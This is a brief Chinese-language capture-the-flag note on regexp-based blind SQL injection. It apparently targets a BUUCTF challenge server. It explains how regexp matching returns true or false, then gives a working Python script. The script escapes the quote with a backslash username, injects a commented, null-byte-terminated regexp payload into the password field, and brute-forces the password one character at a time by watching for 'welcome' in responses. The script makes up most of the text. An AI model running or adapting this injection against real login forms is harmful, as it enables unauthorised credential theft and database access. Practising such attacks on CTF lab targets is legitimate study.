regexp盲注

select (select username from users regexp 正则表达式)

匹配则返回1，反之不匹配返回0

^xxx匹配xxx开头的字符

import string
from urllib import parse
import requests

url='http://57255251-75f0-44e7-a06a-8b81f5d2b486.node4.buuoj.cn:81/index.php'
strings='_'+string.ascii_lowercase+string.digits
passwd=''
while True:
    for j in strings:
        data={
            'username':'\\',
            'passwd':'||/**/passwd/**/regexp/**/"^{}";{}'.format((passwd+j),parse.unquote('%00'))#parse.unqote是不编码%00的意思
        }
        res=requests.post(url,data=data).text
        if 'welcome' in res:
            passwd += j
            print("\r" + passwd, end="")
            break